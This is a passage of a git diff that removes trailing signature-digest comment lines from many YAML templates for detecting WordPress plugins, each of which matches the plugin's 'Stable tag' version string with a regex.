4a0a00473045022071fc1dc0aa1a50e1bb11c65e76e50b7e12a652f8ccc18aa23b2cc504a36c9a390221009b5ac1a36dbe6c86f174568b9959f591b19ec5352eff772569e41dc47ef50fef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 652a4d4c7e..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b25d1647a0e3a6445ee8d3c6403da023411de38a384b6de1e200de2c9e312af022100c8c465a16434bd237705678ded0bb50db77bcace5360cafceb9691b6318b544f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 81e7148f98..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c5b7021e64e7553005e3c0906ca7a4d62dfad01387bbad6731d467cce2ba654022053a97e338520e9e7199dc4e5b6cb1b5c43f3cce96998fcbcd46d54cccdc9fe53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index bac2605b84..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202fa34a0c9e1748a3f7264a60b843423e03733a4477507a5f5500654d8feee6bb02202fbe17ce8e215c45a8d18b86f80af9f9b976547a4f821a9063eede355837b838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index aeaa157d13..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086223102680360d818285a43fd433c73a0ad882228f076b6a468741fffb6f7630220250005c6c90415591a29b165994be73f4f4170cb6c0b65a8352b68b03120ebf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index e79c9cea9f..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad88ded3d2ad1e866ac71c48da64b72b34a7de4001649b7af98d6fe8bbea3508022100976bb9207584ae9aaa81dc58485679f34af3ec11f318cd16e1e90976f161b339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 54fb08cb23..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201d93e4d72db958fd609aa4092aab594a8db57ea80243659d4d143b41c031b8e0022100d9550932df3d82499fcf5d7a974449318f5125a197a8b0a87dfc221015614701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index ebc1b10906..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022010c393b677124e0a413e50d14115683786bb8e1d1e430d2b9ffaf89438caeaad022100ec056262dfa49ca4313a733e6a7c015e46ff2d3b4f39bf4645314a0043e9aefd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 1993f19513..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec33a4a850fc60d745a78d5c64cdf5edea201c6a58abbeff4edc363e55bc9b5a022100874d5095444135bd564700a1eaf9fe3a4ef2b773e895c74b15cbad8552c625ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 94c59a4e45..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200e5bd8972f93310e72e534d823408d0341dd5a4d72c01c20d7ecf1670b785e45022100b589386dac4467175345f96b365a6a00a8bb8312c3da36af5ed9b5377e296d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 153daed8c2..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084a53a5b431c4ad3a39910495d8bd7b22952bc639afc6b1b37be53360635a1b0022100f17b9dea7aa5e22fcf72ba7bc281c979b495daefa575c3a14832d48aeeb33e10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index af15383bee..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c4a030e3722541db872e3215a163d9fa95691c325c206ac88db3d390e41664702202d970b640c222f39cef63da8dab88bdedfb6d2791be088d5a4919c27f7ea9036:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index c0e993089d..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207caa6f2663ed95f5fc47f053de8dbb9a7422cae9178bde4a367be268773b81a402201e16873c2218759b5937f1c11da01fb7862fcb1d9cd617a72244ee6d62595613:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index e7b08c0cff..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a15b6f507303535051d651e6125ba2e516b071acd1406728bbdba9cecc7a54002200239bf61e3fe0ec5fa919cd8e0e3febcd48c15ad0263c2ca90181fa564ac6166:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f0f089d1c2..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cc10fcc55e048b13607a6665cca771b917ff5c92e052b22d09078827f796e1ff022100d782e9f7f20253aa27878bde69d615d39872e5b3f79ed352b48f0a7f18519ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index d89c80f565..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203f2b23d483d4451d78d1aedbb275d2f9e0a69a4413e74b62365451a25cea2b3b022100e746cb47df9c86b11617f3fdeecec19dba7c481cd2bdce04ef4dacd8eb1e610b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index a538f634f0..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f924cc322bbcfb40e8af66529d094d1d6b774e7915139854e0cf77a80bae75c6022100e959c2f77675d2372e555c777cf4cf5cf093a545dea7b7a790d65ab85d9c8431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index d181675bf2..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf709bc69611119af31db3f3c295524089154144c4ede4fbb17c1e568c06a7f6022100f123a372153abe942017d11211dd093a1ff958629aa1e126a2b5f47688ac94d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e9d62ced31..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022063d5ee1dc91045e63f531e677836d291f66772cd0894c1749c7d8017bec86f63022100cd41ea1b21fa94cc615c351e70567a7de654fc240821e0e6af3784d94ceebd02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 6a1ce825d0..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210088046bba4c7bdc4f256f4232211c0474c5dda96b1db287044b37421345efd51202207b2d59f92d66aaa7e29b9012a0795a2af7ad2e807840fcca0f8601ea6194c03e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index ccc753e793..fea9594fa0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0e2e95c5199cd95d3c4153c78383000f01876ab47a647fa5462fdcfac2276f9022100e9305363dd7ac4b4c7fc6a49a0f59b7352a9badd4239541a421e6451a322b4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index ef0b675ca3..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c9b1b265313621b2285e6fcd46e36cd8e1231de2b590ebfc433aa5a3048e1fd402202a8add28acb32730a66f423f539889d3462716b0e4fd788c8beebc5b9313396c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4d09d48f4e..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220237cb9b60d6e87f6d0f0b7e7602a237c7bbc027751edfa9e04165c556e83a22a0220127d6d4efed9ba1cc1db234e0d925a033e4d675dc04714e2ab3fb96d43af3226:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 8dd87713dc..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f23c182dfd8c5a15d0eed5ad98cbdb4b0092adc0bc990ee056d7cb1c20bb5b39022100b0bb2fe389d508eedd6f6963ac169fc38fe57e9f49d3e5be6be5c2ed27bf7691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index ed22cd651a..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b5dc275f15ed64f678fc98ff6e13fad13eccc2129c2464c8fe0157d7d64985bb022100e222d690242f8cfada454228f83f46ea959a714d028e9f4632acf589712740f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index a00f42cb95..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200becd555fa1d887c91d4cdc87788815d1f6ca6e027431c3c3edfa476dedb0d700221008aed395fe4256b454108a1a08a8a297d5ee8382f98f7618595283cf96ac7a969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index c2837cacfa..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8464949204038a7abeb64ca8edb96889b3c9992cfbcd99e76a8e2878a55317d022002494af32b1320f5052dcf61b140282f7bf676a1ea665b213ec8f5175c6476b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 13cadb4c16..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220748a229df8ed7d00644cf3e5b93d48db39e6de1bb6a76eac81990d6ad7eef4b702207d3f6d051ae1180ae75f9fb993ba0e671b2e942e6bd1015a6c0b49739f0d8278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 6410c7b1ab..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a798ec1325a96dc706930e7ce59f6415bfad4c79c69cb6f26734436d4a5bfe45022100eddbc76d4b2baf1858aa0b55091dad3987788b8d20a86b37355ffa2ddd2b17f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index e0a70e17b1..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ed5e52acb70d5b87ed8100e6ebbb057251eb5cf7bb9cba44e4deb93878f975ee022100f68aa8d6158899b4f577aab5c6f4c45b8fe3152289c8ca5c5d0bc0adbae3211b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 6642af2205..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba988a22f8b5a8a31f19141e405815ced66910ff41e1d00c344b0d8288432a2f022100821f34a4d97b4c8cd07839836eb8f89593a23dbf7519721f2cded3f91c469467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 1a575a8531..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a44dc7d5cde151e89df9ac988ead067a2de5672d47972db174c5ded8f5baf55022070b1ae0dc1c12797e7e1188165a8f0fe4380615d107cde07f32ada9da20a4000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 1928e7babc..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220773dcd08ee6401394047cbe1cf724a1c5090ff8d45b16899e57b9931b0674684022008be6c1cdf74305bb63b88774cc82ab1e25eb64d2dbe4e6a509464db450db574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index e1e24f3e73..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022074b90779e6e245cef937ac464429b9350ac2c43d4e32427637e9615fc5b7564e02200eac3f2f6a19df322a1d319b48ceb61cfaf3d3f8160aa923ea0ce49bb156fa97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index e39ea62314..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206bf9fdf5f8051d1d032ff3390b03a8a609bef028bb1a8000d7df7d27735fb354022100bec8503bccf84ca1803999c6d43b209ad243e835ceb48ca1c67a1f44ee5b3267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index b7703f727c..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e306eb9aa4d29a82f42e35b6dd3d68448e5b02e2efba0a00593018a0d33eeeca022100a8d86c5423917b72eae5a1d85216248bae633a24685614dc10e527c81435b91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 5dd35b496a..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200247221a8223479a99286a8d6983a0e53669345843062f568a1abe9863b5200b022100f4a113d88c087c72abbed0641a58ed3ad239fd3e6b484c4aa2187865abf66050:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0d6c91afcf..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e7362bdefc0d1c6d93b913f633465fdc04fbbdaba0396139760e1aaf8b0b77be0221009caec972100ad0fdd0b197a7ee959faea7c02ec8326f0fbdbb97b1e372ea5ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 6c99bfa950..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a74fc7affa47a317272f5b096f3e7db168205acf55c614749901e41f8a2e80030220203fcab5bdfc0a0967251ed37d564060842bb9484b0e636fc15431002b4db7b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index bd0ec913b4..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f69db86fd4c4eb42f62653289828e1fc54dc325256994705c01334aa560212df022100da95b40c415cec665ac3de7117c428ec2bf6e8046f86db821ca6f8eef3bbfe50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 240f62ddd7..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd64be95617a82b5544f5a5d19e33fd9c56cfa6307ba24a7d88437bd4f5e5219022100846c53f5d4a588d28649ef4430e898e72f01fd021d89380864890e906ff7ef5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 3ceeb74945..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008bc2be2fa70dc53c166d7a0437150d8e8296b3bd7e4fab50543938a5f84c4206022100a2b10e03076ab4ef61d64612987dcc8d189f0dd023bdd8a0ef9f6aece9364f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 9c8f656be8..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f7e2f0f4332268e25e2c2a78d15c5c57359d36f210221134cf013fec4d480340221008ffdd1f6b78248f4f6d4304f0227ecd70ba20484189834686ea24279eece014b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 61da87b22d..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ef28ba14081117cd8bf372df19668b1b788cb64dd8d8f5fb17fc4a47d5ee026f0220603625d3d6d3b1983eb015117009881b9c7c9984e619a1fe5603d8388695ff5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 6f92e874e6..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9dd75cd6acf1d20b3c255215d98d8435b35f04192a41fdfec9d4b9f0f417327022019fceae3d82cdc379e3253963556a22ab76a5ed71c5added070e7b73e53cbf2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index ef5aa08fe8..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e71f8402022be307e5da3239b1626584effdf4ea8849d2b5795332420bbaa2ea02205b6b82112a3f6c1913a829513b5da26f44271754a6e1eab98ef1e56112a73c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 158c06c37d..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2464873976af7df3bf00122c414c00a24aeaa11197a5b152b1592d74bccfd1702202cf3b58a5770f569513bbcc7aa98364d3c62534787e8cf20e6f2de8162e4b93b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 0191e39b49..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022035581b839aabfd7754c2074cb2d50079b06a72fd4f05c3e3cf0474d99e8232f0022100ac8c646cc421bc52029259f05b8a334e165359ede45027838195bbfb65dfbe79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml 